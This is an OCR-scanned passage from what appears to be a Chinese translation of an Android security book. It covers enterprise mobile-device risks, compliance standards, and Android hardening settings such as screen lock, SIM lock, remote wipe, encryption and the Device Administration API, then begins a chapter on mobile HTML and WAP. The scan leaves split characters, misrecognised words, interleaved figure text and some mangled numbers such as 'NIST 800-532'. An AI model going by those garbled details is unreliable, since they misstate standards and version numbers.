8. 缺少 修补 应 用 程序 和 操作 系统 漏洞 的 管理 

在 采用 BYOD 模式 的 企业 环境 下 ， 这 是 一 个 很 严重 的 问题 。 携 带 个 人 移动 设 
备 的 企业 员工 ， 很 可 能 不 会 修补 或 更 新 已 经 发 布 的 针对 他 们 设备 的 操作 系统 /应 用 
程序 的 安全 补丁 ， 从 而 导致 企业 资源 暴露 在 安全 风险 之 下 。 试 想 一 下 ， 在 你 的 周围 
可 能 存在 着 各 种 版 本 的 Android 系统 (从 2. 2.21 版 本 到 4. x 系列 版 本 )， 并且 每 一 
个 版 本 的 Android 系统 都 可 能 存在 各 种 安全 问题 。 用 户 很 可 能 并 没有 升级 他 们 的 
Android 系统 版 本 或 及 时 安装 安全 漏洞 修复 补丁 。 而 且 ， 很 多 用 户 也 不 会 及 时 地 更 
新 设备 上 的 应 用 程序 版 本 。 

监控 企业 员工 的 移动 设备 ， 试 图 确定 这 些 设备 的 操作 系统 /应 用 程序 的 版 本 信 
息 ， 就 可 以 根据 这 些 信息 标识 出 存在 于 企业 环境 下 的 不 安全 的 操作 系统 /应 用 程序 。 
然后 ， 有 针对 性 地 要 求 这 些 存在 风险 的 设备 用 户 做 出 选择 : 要 么 升级 其 设备 系统 / 
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应 用 程序 版 本 ; 要 么 取消 其 访问 企业 资源 的 权限 。 
9.1.2 终端 用 户 的 安全 意识 


任何 确保 移动 设备 信息 安全 或 通过 移动 设备 访问 企业 资源 的 安全 策略 ， 都 离 不 
开 对 移动 终端 用 户 的 安全 培训 。 通 过 培训 ,使 用 户 了 解 到 各 种 安全 风险 (如 上 所 
列 ) 认识 到 安全 管控 制度 至 关 重 要 的 原因 。 自 觉 遵守 安全 管控 制度 ， 应 当 作 为 用 
户 需要 接受 的 在 企业 环境 下 移动 设备 使 用 政策 的 一 部 分 ， 并 且 要 求 用 户 每 年 至 少 需 
要 复习 一 次 这 些 政策 。 而 且 ， 每 年 的 安全 意识 培训 和 培训 后 的 测试 ， 应 当 把 用 户 心 
中 一 些 好 的 安全 做 法 吸收 进来 。 此 外 ， 还 应 当 在 安全 意识 培训 中 ， 补 充 一 些 对 用 户 
使 用 移动 设备 时 特定 操作 行为 的 告 诚 ， 从 而 防止 他 们 使 用 未 经 企业 批准 的 操作 行为 
(例如 ， 使 用 移动 设备 访问 有 害 的 网 站 ， 下 载 亚 意 代码 等 ) 。 


9.1.3 合 规 / 审 查 事项 


企业 需要 向 客户 、 审 查 人 员 和 其 他 的 利益 相关 者 展示 企业 的 安全 性 。 如 今 , 移 
动 设备 逐渐 成 为 企业 “计算 基础 设施 ”中 不 可 缺少 的 一 部 分 。 因 此 ， 自 然 成 为 审 
查 人 员 深 入 检查 的 对 象 之 一 。 虽 然 当 前 的 安全 认证 RE) 还 无 法 跟 上 移动 设备 
威胁 方式 的 发 展 速度 ， 但 是 对 于 移动 设备 〈 以 及 针对 移动 设备 开发 的 应 用 程序 ) 
来 说 ， 基 本 的 安全 防护 措施 还 是 必 不 可 少 的 。 和 否则 ， 如 果 你 的 移动 设备 /基础 设施 
的 安全 性 没有 得 到 增强 ， 因 而 在 安全 审查 时 发 现 安全 问题 ， 那 么 在 一 些 情况 下 
(取决 于 企业 的 监管 条 例 / 准 则 ) ， 你 将 会 受到 处 罚 。 

ISO 27002 是 ISO/IEC HUO 发 布 的 一 套 被 广泛 使 用 的 安全 体系 标准 。 它 列举 
了 39 个 管控 对 象 和 130 多 个 安全 控制 措施 ， 用 于 确保 企业 环境 的 安全 。 其 中 很 多 
控制 措施 为 保护 移动 设备 、 数 据 ， 以 及 移动 设备 上 的 应 用 程序 的 安全 性 提供 直接 或 
间接 地 指导 。 控 制 措施 9. 2.5 (Control 9.2.5) 条 款 用 于 处 理 实体 安全 问题 ， 控 制 
Hi 10. 8. 1 条 款 用 于 处 理 信息 交换 ， 以 及 控制 措施 11.7. 1 条 款 专 门 用 于 制定 和 颁 
布 各 种 安全 制度 和 措施 ， 解 决 来 自 移动 设备 的 各 种 威胁 。 

除了 上 面 提 到 的 这 些 控制 措施 外 ， 还 可 以 在 移动 设备 上 使 用 一 些 其 他 的 控制 措 
施 。 例 如 ， 定 期 地 打 补 丁 、 安 全 扫描 、 安 全 强化 和 使 用 加 密 等 措施 。 在 “信息 系 
统 的 购买 、 开 发 和 维护 ”方面 ， 制 定 控 制 措施 的 宗旨 是 ， 在 开发 信息 系统 和 应 用 














O ISO/IEC 机 构 ， 即 ISO/IEC 联合 信息 技术 委员 会 (ISO/IEC JOINT TECHNICAL COMMITTEE FOR IN- 
FORMATION TECHNOLOGY), ， 是 国际 标准 化 组 织 (ISO) 和 国际 电工 委员 会 (IEC) 联合 组 建 的 第 
一 个 标准 化 技术 委员 会 ， 其 编号 为 JTC1。 它 在 ISO 和 正 C 共同 领导 下 ， 承 担 信息 技术 领域 国际 标准 
制定 工作 ， 其 重要 性 和 影响 力 非 同一 般 。 国 际 标准 化 组 织 和 国际 电工 委员 会 这 两 大 国际 顶尖 的 标准 
化 机 构 ， 长 期 以 来 ， 形 成 了 既 有 明确 的 业务 分 工 ， 同 时 又 相互 协作 的 良性 互动 关系 ， 具 体 地 说 ，IEC 
负责 电工 技术 领域 的 国际 标准 制定 工作 ， 其 他 领域 则 由 ISO 负责 。 一 一 译 者 注 
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程序 时 ， 应 充分 考虑 开发 产品 的 安全 性 。 编 写 最 佳 的 代码 处 理 过 程 (如 输入 验证 、 
输出 编码 ， 以 及 错误 检查 等 ) 是 实现 该 宗旨 的 重要 组 成 部 分 。 在 保护 移动 设备 信 
息 安 全 的 问题 上 ， 其 他 的 标准 (例如 ，NIST 800-532 和 PCI DSS? ) 有 着 类 似 的 规 
定 。 在 本 质 上 ， 这 些 标准 的 核心 都 是 强调 对 移动 资产 的 威胁 因素 进行 定期 的 评估 、 
确定 安全 问题 、 落 实 防 控 措 施 ， 以 及 加 强 对 终端 用 户 和 开发 人 员 的 安全 教育 。 
9.1.4 移动 设备 安全 措施 推荐 

针对 企业 环境 下 移动 设备 的 安全 控制 措施 ， 主 要 可 以 分 为 以 下 四 类 ; 

1) 功能 上 的 制度 和 约束 : 限制 用 户 和 应 用 程序 使 用 移动 设备 上 的 部 分 硬件 功 
能 (例如 ， 照 相机 、GPS)， 配 置 无 线 网 络 和 虚拟 专用 网 (Virtual Private Network, 
VPN) ， 将 用 户 在 企业 环境 下 在 移动 设备 上 的 使 用 记录 /违规 操作 发 送 到 远程 服务 
器 ， 提 供用 户 可 以 使 用 的 应 用 程序 白 名 单 ， 以 及 阻止 root 处 理 过 的 设备 访问 企业 资 
源 和 网 络 。 

2) 数据 保护 ， 主 要 包括 对 本 地 存储 和 外 部 存储 加 密 、 使 用 VPN 通信 访问 受 保 
护 的 资源 ， 以 及 使 用 强大 的 通信 加 密 算 法 。 此 外 ， 还 包括 在 丢失 或 被 瓷 的 设备 上 ， 
使 用 远程 擦 除 功 能 。 

3) 访问 控制 : 主要 包括 设备 用 户 的 身份 验证 (例如 ， 验 证 PIN 码 、SIM 密 
码 )， 以 及 使 用 每 个 应 用 程序 时 需要 密码 验证 使 用 者 身份 。 此 外 ， 当 设备 闲置 一 段 
时 间 后 (推荐 为 2 ~5min) ， 需 要 重新 输入 PIN 码 /密码 验证 使 用 者 的 身份 。 

4) 应 用 程序 : 专门 针对 应 用 程序 实施 的 控制 措施 ， 主 要 包括 对 应 用 程序 来 
源 / 应 用 程序 市 场 的 审核 ， 要求 用 户 只 能 从 审核 通过 的 应 用 程序 源 / 应 用 市 场 上 下 
载 、 安 装 应 用 程序 和 更 新 应 用 程序 ; 仅 允 许 用 户 安装 可 靠 的 应 用 程序 (即使 用 可 
靠 的 数字 证 书签 名 的 应 用 程序 ); 禁止 用 户 使 用 基于 公共 云 的 应 用 程序 数据 备 




















© NIST 800-53 即 推荐 的 联邦 信息 系统 和 组 织 的 安全 控制 措施 ， 是 NIST ( National Institute of Standards 
and Technology , 美国 国家 标准 与 技术 研究 院 ) 在 FISMA 项 目 实 施 中 产生 的 重要 安全 标准 和 指南 之 
， 是 信息 安全 风险 管理 框架 的 重要 组 成 部 分 。 该 标准 主要 介绍 了 安全 控制 措施 选择 和 标准 化 的 基 
本 概念 ， 以 及 为 信息 系统 选择 和 说 明 控 制 措施 的 过 程 ， 以 帮助 组 织 部 分 达到 对 信息 系统 安全 和 风险 
的 有 效 管理 。 它 为 选择 和 规定 信息 系统 安全 控制 措施 提供 了 指导 原则 ， 为 安全 管理 者 、 安 全 服务 提 
供 者 、 安 全 技术 开发 人 员 、 系 统 开发 人 员 、 系 统 实施 人 员 和 系统 评估 者 提供 了 指导 。 一 一 译 者 注 
© PCI DSS (Payment Card Industry Data Security Standard, 支付 卡 行业 数 据 安 全 标准 ) ， 也 称 为 第 三 方 支 
付 行业 数据 安全 标准 ， 是 由 PCI 安全 标准 委员 会 的 创始 成 员 (Visa、MasterCard American Express, 
Discover Financial Services, JCB 等 ) 制定 的 ， 旨 在 使 国际 上 采用 一 致 的 数据 安全 措施 ， 该 标准 (PCI 
DSS) 在 支付 网 关 的 安全 方面 做 出 标准 的 要 求 ， 其 中 包括 安全 管理 、 策 略 、 过 程 、 网 络 体系 结构 、 软 
件 设计 的 要 求 列表 等 ， 全 面 保障 交易 安全 。 适 用 于 所 有 涉及 支付 卡 处 理 的 实体 ， 包括 商户 、 处 理 机 
构 、 购 买 者 、 发 行商 和 服务 提供 商 及 储存 、 处 理 或 传输 持 卡 人 资料 的 所 有 其 他 实体 。 此 外 ，PCI DSS 还 
包括 一 组 保护 持 卡 人 信息 的 基本 要 求 ， 并 可 能 增加 额外 的 控制 措施 ， 以 进一步 降低 风险 。 一 一 译 者 注 
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份 /恢复 服务 。 


9.2 强化 Android 安全 性 


上 一 节 主 要 分 析 了 常见 的 移动 设备 的 威胁 方式 ， 以 及 一 些 可 以 采用 的 威胁 应 对 
措施 。 本 节 将 详细 介绍 如 何 配置 (强化 ) Android 设备 的 安全 设置 ， 以 降低 各 种 安 
全 风险 。 对 此 ， 本 节 将 从 两 个 部 分 进行 介绍 : 通过 更 改 安全 配置 (强化 ) 增强 
Android 设备 的 安全 性 和 开发 安全 的 Android 应 用 程序 。 














9.2.1 安全 部 署 Android 设备 























Android 设备 出 三 时 ， 系 统 被 设置 为 默认 的 出 厂 模 式 。 然 而 出 于 安全 考虑 ， 将 
设备 配置 成 最 佳 的 安全 设置 ， 以 及 用 户 所 需 的 各 种 功能 设置 ( 即 确保 设备 安全 性 
的 各 种 安全 设置 ) ， 往 往 需要 用 户 自行 配置 ， 尤 其 对 于 企业 环境 来 说 ， 更 是 如 此 。 
随 着 Android 系统 版 本 的 不 断 升 级 ，Android 系统 的 安全 设置 方式 也 随 之 不 断 改进 ， 
配置 起 来 变 得 更 加 容易 。 用 户 所 做 的 各 种 安全 配置 既 可 以 直接 应 用 在 本 地 设备 上 ， 
也 可 通过 Exchange ActiveSync 邮件 机 制 推送 到 其 他 Android 设备 上 上。 此外， 有 些 
Android 设备 厂商 还 提供 了 额外 的 系统 安全 配置 工具 软件 (厂家 自主 开发 的 或 第 三 
方 软件 开发 商 提供 的 ) ， 供 用 户 快捷 地 增强 设备 的 安全 性 能 。 





















































1. 未 授权 的 设备 访问 

正如 本 章 前 面 所 提 到 的 ， 缺 乏 对 移动 设备 
的 实际 管控 ， 是 用 户 和 企业 在 增强 Android ix 
备 安全 性 时 ， 需 要 面 对 的 主要 问题 之 一 。 对 于 
这 一 问题 , 可 以 在 Android 设备 上 通过 下 述 安 
全 功能 配置 予以 一 定 程度 的 缓解 。 

(1) 设置 锁 屏 

该 功能 设置 启用 后 ， 用 户 需 要 输入 正确 的 
PIN 码 或 密码 后 ， 才 可 以 使 用 Android 设备 。 
当然 ,用 户 也 可 以 不 使 用 这 种 设置 ， 但 是 ， 出 
于 确保 移动 设备 的 安全 性 ， 本 书 强 烈 建 议 用 户 
使 用 该 功能 设置 。 启 用 此 设置 ,需要 按照 如 下 
操作 流程 进行 设置 ; “Settings”- > “Securi- 
ty" -> “Screen Lock”， 然 后 在 “PIN ” 和 
“Password” 中 选择 一 项 ， 作 为 屏幕 解锁 的 密 
人 码 形式 。 本 书 建议 用 户 使 用 复杂 的 密码 或 8 位 
的 PIN 码 作为 屏幕 解锁 密码 (设置 过 程 如 
图 9.1 所 示 )。 当 “Scereen Lock ( 8i Bg)" Dy 
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SCREEN SECURITY 


Screen lock 
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5554:4.2.1 


Power button instantly locks 


Owner info 
SIM CARD LOCK 


Set up SIM card lock 


Make passwords visible 


DEVICE ADMINISTRATION 


Device adminis 


Unknown sources 





图 9.1 


启用 锁 屏 功能 
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能 启用 后 ， 用 户 还 应 当 同时 更 新 自动 锁 屏 超时 间隔 值 ( 见 图 9.2) 。 


(2) um SIM 卡 锁定 

开启 "SIM 卡 锁定 功能 (SIM card lock)” 
后 ,设备 会 强制 用 户 输入 PIN 码 ， 只 有 输入 正 
确 的 PIN 码 ， 用 户 才 能 使 用 “手机 ”功能 。 否 
则 ， 用 户 将 无 法 拨打 电话 或 发 送 短信 。 开 局 SIM 
卡 锁 定 功能 ， 需 要 按照 如 下 操作 流程 进行 设置 ; 
依次 进入 “Settings”-> “Set up SIM card lock" 
(如 图 9.3 和 图 9.4 所 示 )， 然 后 启用 “Lock 
SIM card” 选 项 设置 。 设 置 一 个 与 屏幕 解锁 密码 
不 同 的 值 ， 作 为 解锁 SIM 卡 的 PIN fij, 

(3) 远程 擦 除 

系统 管理 员 能 够 通过 Exchange ActiveSync 邮 
件 机 制 ， 启 用 “远程 擦 除 ” 功 能 。 如 果 用 户 的 
Android 设备 连接 到 公司 的 Exchange 服务 器 ， 那 
么 当 设备 丢失 或 被 盗 时 ， 激 活 远 程控 除 功能 ， 
擦 除 Android 设备 上 的 重要 资料 数据 ， 对 于 确保 
移动 设备 的 信息 安全 性 至 关 重 要 。 此 外 ， 使 用 








Immediately 


5 seconds 


15 seconds 


30 seconds 


1 minute 


2 minutes 


5 minutes 


10 minutes 


30 minutes 





图 9.2 自动 锁 屏 超 时 间隔 值 


Exchange ActiveSync 邮件 机 制 ， 还 可 以 将 其 他 的 功能 设置 (例如 ， 密 码 复 杂 度 验 


证 ) 推送 到 移动 设备 上 ， 从 而 实现 移动 设备 的 远 


面 将 会 介绍 。 





SIM card lock settings 


Lock SIM 
Require PIN to use phone 


图 9.3 启用 SIM 卡 锁 





远程 管控 ， 这 部 分 内 容 在 本 音 的 后 


Lock SIM card 


SIM PIN 


9.4 向 SIM 卡 锁 输 入 PIN 码 
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和 远程 擦 除 功能 可 以 将 手机 上 的 所 有 数据 擦 除 控 ， 将 手机 恢复 到 出 厂 状 态 。 擦 除 
的 内 容 包括 所 有 的 电子 邮件 数据 ， 以 及 应 用 程序 设置 等 。 不 过 ， 远 程 擦 除 功能 无 法 


删除 存储 在 外 部 SD 卡 上 的 数据 资料 。 pup 
2. 其 他 设置 E 3 Security 


除了 上 述 功能 设置 外 ， 本 书 强烈 建议 。 EE 
Android 设备 用 户 禁 用 “Make password visible Amm 
CHETI)” A, MATEA GGA NMMNNN 
窥探 用 户 在 移动 设备 上 的 操作 、 用 户 隐私 ， 及 
个 人 数据 。 禁 用 这 一 功能 ， 可 以 使 用 户 在 设备 
上 输入 密码 或 PIN 码 时 ， 输 入 的 字符 不 会 在 屏 Set up SIM card lock 
幕 上 回 显 出 来 。 用 户 可 按照 如 下 操作 禁用 该 功 





Power button instantly locks 


Owner info 


SIM CARD LOCK 














能 : 进入 Settings” 界面 勾 掉 “Make pass- Make passwords visible 
word visible" 选项 $ 如 图 9.5 所 示 。 DEVICE ADMINISTRATION 


Device administrators 
View or deactivate device administrator: 


此 外 ， 本 书 还 建议 用 户 禁 用 “Unknown 
Sources. (允许 安装 来 自 未 知 源 的 应 用 程序 )” 
选项 。 本 书 前 面 已 经 提 到 ， 对 于 Android 系 
统 来 说 ， 除 了 Google Play 外 ， 还 有 很 多 的 
二 级 应 用 程序 商店 。 对 于 从 未 知 源 下 载 的 应 图 9.5 禁用 “Make password visible” 和 
用 程序 ， 递 慎 起 见 ， 用 户 应 当 在 验证 其 可 靠 lo ne 0 
性 之 后 ， 再 去 信任 并 安装 这 些 应 用 程序 。 禁 
用 “Unknown Sources” 选 项 ， 可 以 阻止 从 其 他 源 下 载 的 应 用 程序 ， 被 用 户 安 装 在 
Android 设备 上 ， 如 图 9.5 所 示 。 

此 外 ， 在 增强 Android 设备 的 安全 性 方面 ， 还 有 一 条 重要 的 原则 就 是 ， 关 掉 所 
有 不 需要 的 服务 。 用 户 应 当 关 掉 “ 蓝 牙 "、“NFC” 和 “定位 功能 ”， 除 非 需 要 使 用 
这 些 功能 ( 见 图 9.6) 。 同 时 ， 用 户 还 应 当 到 Wi- Fi 设置 界面 关 掉 “Netwodk notifi- 
cation (网 络 通知 ) ”功能 〈 见 图 9.7)。 这 可 以 使 用 户 自 己 选择 一 个 Wi- Fi 网 络 来 
连接 ， 而 使 设备 不 能 自动 连接 到 任何 可 获得 的 Wi-Fi 网 络 。 此 外 ， 不 建议 用 户 将 设 
备 上 的 数据 备份 到 “Gmail 或 Google” 账 户 上 或 Dropbox? 上。 此 外 ， 创 建 一 个 可 供 
用 户 使 用 的 应 用 程序 白 名 单 ， 将 所 有 通过 安全 审核 的 可 靠 的 应 用 程序 列 在 这 个 名 单 
上 。 然 后 ， 通 过 安全 教育 和 培训 ， 使 设备 用 户 自 觉 地 使 用 名 单 上 的 应 用 程序 ， 而 不 
去 下 载 并 安装 名 单 之 外 的 、 其 他 未 经 审核 的 应 用 程序 。 












































© Google Play, Google 电子 市 场 ， 其 前 身 名 为 Android Market， 是 一 个 由 Google 公司 为 Android 设备 开发 
的 在 线 应 用 程序 商店 。 译 者 注 
O Dropbox 是 一 个 提供 同步 本 地 文件 的 网 络 存储 在 线 应 用 。 支 持 在 多 台电 脑 多 种 操作 中 自动 同步 ， 并 可 
当 作 大 容量 的 网 络 硬 盘 使 用 。 译 者 注 
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图 9.6 禁用 “定位 服务 ” 图 9.7 禁用 “网 络 通知 ”功能 


Android 4. 2 版 本 的 系统 增加 了 一 个 新 的 功能 ， 提 升 了 对 恶意 应 用 程序 的 防范 
能 力 。 该 功能 开启 后 ， 系 统 会 通过 Google 对 正在 安装 的 应 用 程序 进行 在 线 验 证 。 
然后 ，Android 系统 将 根据 该 应 用 程序 的 风险 情况 ， 告 诚 用 户 安装 该 应 用 可 能 带 来 
危害 。 需 要 注意 的 是 ， 系 统 验证 应 用 程序 的 过 程 中 ， 需 要 向 Google 发 送 一 些 数 据 
(如 日 志 、URL、 设 备 ID 和 操作 系统 信息 等 ) 。 要 想 开 启 这 一 功能 ， 需 要 依次 进行 
下 述 操作 :“Settings”- > “Security” -> “Verify Apps” o 

在 Android 系统 上 ， 另 一 个 比较 实用 的 功能 是 ， 启 用 “Always on VPN (总 是 通 
it VPN 连接 网 络 )”。 该 功能 开启 时 ， 应 用 程序 只 有 通过 系统 开启 的 VPN 才能 连接 
到 网 络 ， 如 果 VPN 处 于 关闭 状态 ， 应 用 程序 将 无 法 连接 到 外 部 网 络 。 此 外 ， 本 书 
还 建议 用 户 关 掉 Android 设备 上 的 USB 调试 功能 ， 如 图 9.8 所 示 。USB 调试 功能 
可 以 使 用 户 将 手机 连接 到 adb shell 上 ， 导 致 设备 上 的 信息 被 完整 列 出 ， 造 成 
泄露 。 

在 Android 设备 上 ， 浏 览 器 是 最 常用 的 应 用 程序 之 一 。 用 户 应 当 谨 慎 地 配置 济 
览 絮 的 安全 和 隐私 设置 (例如 ， 禁 用 位 置 访问 ) ， 图 9.9 展示 了 浏览 器 应 用 程序 的 
各 种 安全 设置 选项 。 

3. 加 密 

Android 3. 0 及 后 续 版 本 的 系统 都 具有 全 部 磁盘 加 密 的 功能 (不 包括 SD 卡 )。 
启用 该 功能 ， 可 以 对 手机 上 的 所 有 数据 进行 加 密 。 当 手机 丢失 或 被 盗 时 ， 经 过 加 密 
的 数据 如 果 没 有 密码 将 无 法 恢复 。 不 过 ， 这 里 需要 说 明 的 是 ， 锁 屏 密码 务必 要 和 磁 
盘 加 密 密 码 一 致 。 一 旦 手机 被 加 密 ， 在 设备 开机 引导 时 ， 需 要 用 户 输入 锁 屏 密码 ， 
对 手机 进行 解密 。 

开局 手机 磁盘 加 密 功 能 ， 需 要 用 户 使 用 手机 完成 以 下 步骤 : 

1) 设置 一 个 强大 的 PIN 码 或 密码 。 
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[E Developer options 


USB debugging 


Developme 


Desktop backup password 


emove the passwoi 


USER INTERFACE 


Strict mode enabled 


KI 9. 8 


2) 插 上 电源 给 手机 充电 。 
当 用 户 准备 好 加 密 手 机 磁盘 时 ， 需 依次 进行 下 述 


设置 : “Settings”- > “Securi 


(加 密 手 机 )”， 跳 转 到 “Enerypt phone” 设 置 界面 ， 


启用 “Encrypt phone” HJE, 


码 。 开 启 手 机 加 密 后 ， 用 户 需 
输入 锁 屏 密码 或 PIN 码 解除 手机 加 密 锁 定 。“ Encrypt 





phone” 设 置 界面 如 图 9. 10 所 


9.2.2 设备 管理 





Android 2. 2 版 本 之 后 的 系统 ， 为 程序 开发 者 提 
供 了 一 套 Android 设备 管理 API (Android Device 
Administration API，Android 设备 管理 应 用 程序 编程 接 
口 ，ADAAPI) 。 这 套 API 用 于 开发 对 安全 性 敏感 的 





企业 应 用 程序 。 





禁用 “USB 调试 ”功能 


Clear history 
lear the browser navigatio 
Show security warnings 
Show warning if ther 
COOKIES 
Accept cookies 
Allow sites to save and read cookie data 
ll cookie data 

lear all browser cookie 


FORM DATA 


Clear form data 
Cleai 


r all saved form data 
LOCATION 


Enable location 


ites to request access to your location 
Clear location access 

clear location access for all website: 
PASSWORDS 


Remember passwords 


图 9.9 浏览 器 安全 设置 选项 


ty” -> “Encrypt phone 


输入 锁 屏 密码 或 PIN 
要 在 手机 开机 引导 时 ， 


7o 








图 9.10 手机 加 密 








Android 系统 内 置 的 电子 











I PT EY , 使 用 这 套 API 改进 了 对 Exchange 服务 机 


制 口 的 支持 ,使 管理 员 能 够 借 此 执行 某 些 特定 的 安全 设置 ， 如 远程 擦 除 、 锁 屏 、 超 时 、 





© Exchange 服务 机 





央 ， 是 一 个 消息 与 协作 系统 ， 它 是 由 客 








户 端 和 Exchange 服务 器 构成 的 。 其 中 ， 















































Exchange 服务 器 可 以 被 用 来 构架 应 用 于 企业 、 和 学校 的 邮件 系统 ， 甚 至 于 类 似 搜 狐 或 新 浪 那 样 的 免费 
邮件 系统 。Exchange 服务 器 还 是 一 个 协作 平台 。 你 可 以 在 此 基础 上 开发 工作 流 、 知 识 管理 系统 、 命 








令 收 发 控制 系统 或 者 是 其 他 消息 系统 。 一 一 译 者 注 
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密码 复杂 性 验证 ， 以 及 加 密 等 。 同 样 ， 第 三 方 软件 商 开 发 提供 的 移动 设备 管理 
( Mobile Device Management, MDM) 程序 也 需要 使 用 这 套 API, 实现 对 Android 





设备 的 管理 。 








系统 管理 员 或 开发 者 使 用 这 套 API 编写 对 安全 性 敏感 的 应 用 程序 。 这 类 应 用 程 


序 能 够 执行 本 地 或 远程 安全 策略 。 其 中 ， 本 地 安 
全 策略 可 以 在 本 地 应 用 程序 中 以 硬 编码 的 形式 实 
现 ， 也 可 以 是 从 远程 服务 器 上 取得 (例如 ， 通 过 
电子 邮件 的 Exchange 服务 器 ， 如 图 9. 11 所 示 ) 。 
通常 情况 下 ， 用 户 需 要 从 Google Play 或 其 他 的 安 
装 媒 介 上 获得 并 安装 这 类 应 用 程序 。 以 电子 邮件 
程序 为 例 ， 默 认 人 情况 下 ，Android 系统 预先 安装 
了 电子 邮件 应 用 程序 。 因 此 ， 当 设备 同步 /连接 
到 企业 Exchange 服务 器 时 ， 通 过 该 应 用 程序 向 用 
户 设备 推送 安全 策略 就 变 得 相当 的 容易 和 便捷 。 
一 旦 这 类 应 用 程序 安装 完成 (或 配置 完毕 ， 以 电 
子 邮 件 程序 为 例 ) ， 系 统 就 会 提示 用 户 ， 激 活 设备 
管理 应 用 程序 。 如 果 用 户 同 意 这 样 做 ， 安 全 策略 
就 会 继续 提示 用 户 进行 下 一 步 功 能 设置 。 不 过 ， 
如 果 用 户 拒绝 激活 设备 管理 应 用 程序 ， 用 户 将 被 


































































































Device administrators 





图 9.11 


Email 


i Erie gx 




















电子 邮件 应 用 程序 推送 
服务 器 定义 的 策略 

















禁止 使 用 一 些 特定 的 功能 (例如 ， 连 接 并 访问 企业 资源 、 同 Exchange 服务 器 同步 ) 。 
Android 设备 管理 API 支持 的 部 分 安全 策略 如 下 ， 这 些 安全 策略 能 够 被 设备 管 








理 程序 执行 。 

e 启用 密码 

e 最 小 密码 长 度 

e 密码 强度 /复杂 性 
e 密码 过 期 

e 密码 历史 记录 限制 
e 锁 屏 超时 

e 存储 加 密 

e 远程 擦 除 











在 Android 系统 上 ， 通 过 电子 邮件 应 用 程序 推送 的 安全 策略 ， 如 图 9. 12 所 示 。 
这 些 策 略 属 于 需要 在 企业 环境 下 执行 的 一 些 比 较 有 代表 性 的 策略 。 




















148 Android 系统 安全 与 攻防 





Device administrator 


ie» Email 
ap 1 rf 
Erase all data 


Set password rules 


Monitor screen-unlock 
attempts 


Lock the screen 


Set lock-screen password 
expiration 


Cancel Deactivate 





图 9.12 通过 电子 邮件 应 用 程序 推送 的 安全 策略 





9.3 小 结 





本 章 首先 分 析 了 企业 环境 下 部 署 移动 设备 存在 的 各 种 安全 问题 ， 以 及 如 何 去 减 
少 这 些 问题 。 随 后 ， 本 章 简 要 但 全 面 地 介绍 了 Android 系统 上 的 各 种 安全 功能 设 
置 ， 通 过 这 些 安 全 功能 设置 ， 可 以 有 效 地 降低 部 分 安全 风险 。 最 后 ， 通 过 对 
Android 设备 管理 API 机 制 进 行 分 析 ， 得 出 结论 ， 即 可 以 使 用 这 套 设备 管理 API 在 
Android 设备 上 执行 各 种 安全 策略 ， 从 而 确保 移动 设备 和 企业 资源 的 安全 。 
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本 章 主要 审视 移动 设备 上 的 HTML 和 浏览 带 的 安全 问题 ,介绍 各 种 可 能 发 生 
的 不 同类 型 的 攻击 ， 以 及 浏览 器 的 漏洞 。 最 后 ， 本 章 将 讨论 借助 移动 设备 可 能 发 起 











的 各 种 高 级 别 的 攻击 手段 。 


10.1 移动 HTML 安全 


随 着 移动 设备 的 日 益 普 及 和 越 来 越 多 的 人 开始 使 用 移动 设备 访问 网 站 获取 信 


A, 传统 的 网 站 模式 因此 而 逐步 发 展演 人 化。 起初， 移 
动 设备 上 的 浏览 器 只 能 从 传统 的 网 站 (面向 桌面 电脑 
的 网 站 ) 上 获取 信息 。 如 今 ， 大 部 分 网 站 已 经 开始 支 
持 无 线 应 用 程序 协议 ( Wireless Application Protocol, 
WAP) 技术 或 移动 HTML (一 种 面向 移动 设备 的 简化 
网 站 ) o 

WAP 规范 定义 了 一 组 协议 族 ， 用 于 实现 通过 移动 
设备 更 加 高 效 地 查看 网 站 信息 。WAP 协议 族 由 以 下 各 
层 构成 (ILEI 10.1): 无 线 数据 报 协议 (Wireless Data- 
gram Protocol ，WDP) 、 无 线 传输 层 安全 (Wireless Trans- 
port Layer Security，WTLS) 、 无 线 传输 协议 (Wireless 
Transaction Protocol, WTP), J 2E Wh WX (Wireless 
Session Protocol, WSP) 和 无 线 应 用 程序 环境 (Wireless 
Application Environment ，WAE) 。 该 协议 族 可 在 任何 无 线 
网 络 上 工作 。 协 议 族 内 各 层 详细 介绍 见 表 10. 1 。 


表 10.1 WAP 协议 族 








层 说 — Hj 





无 线 应 用 程序 环境 (WAE) 


无 线 会 话 协议 (WSP) 


无 线 传输 协议 〈(WTP) 


无 线 传输 层 安 全 (WTLS) 


无 线 数据 报 协议 (WDP) 


无 线 网 络 


10.1 WAP 协议 族 








无 线 数据 报 协议 (WDP) 





持 和 其 他 类 似 于 传输 层 功 能 的 支持 


位 于 协议 族 的 最 底层 ， 对 上 层 提 供 不 可 靠 的 数据 传输 (例如 ，UDP) x 





无 线 传输 层 安全 ( WTLS) 提供 公 钥 加 密 安 全 机 制 








无 线 传输 协议 〈WTP) 提供 可 靠 的 传输 支持 〈 例 如 ， 可 靠 的 请 求 和 响应 ) 








无 线 会 话 协议 (WSP) 提供 HTTP (Hyper Text Transport Protocol， 超 文本 传输 协议 ) 功能 
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( 续 ) 





提供 无 线 标记 语言 (Wireless Markup Language，WML) 、WMLScript 和 无 
线 电话 应 用 (Wireless Telephony Application, WTA) 程序 接口 。WML 是 一 
种 类 似 于 HTML (Hypertext Markup Language， 超 文本 标记 语言 ) 的 标记 语 


n 
x 
Rt 


用 程序 环境 (WAE) 























言 ，WMLScript 是 一 种 类 似 于 JavaScript 的 脚本 语言 ，WTA 支持 电话 功能 








在 典型 的 互联 网 或 WWW (World Wide Web， 万 维 网 ) 模型 里 ， 客 户 端 将 请 求 
发 送 给 服务 器 。 服 务 器 处 理 收 到 的 请 求 并 向 客户 端 发 回响 应 〈 或 内 容 ) ， 如 图 10.2 
所 示 。 在 WAP 模型 中 ， 该 过 程 或 多 或 少 和 WWW 模型 的 过 程 有 些 类 似 。 不 过 , 在 
WAP 模型 中 ， 客 户 端 和 服务 器 之 间 存 在 一 个 网 关 或 代理 ， 它 会 对 这 些 请 求 和 响应 
进行 处 理 (编码 /解码 )， 使 这 些 请 求 和 响应 更 加 适合 移动 设备 ， 如 图 10. 3 所 示 。 
同 1.0 版 本 的 WAP 相 比 ，2.0 版 本 的 WAP 提供 了 更 加 丰富 的 功能 支持 和 端 到 端的 


安全 支持 。 
— inn 








响应 (内容) 





图 10.2 WWW 模型 





移动 设备 


idi: 


1. 0 版 本 的 WAP 没有 提供 端 到 端的 SSL/TLS 支持 。 在 WAP 1.0 里 ， 移 动 设 备 
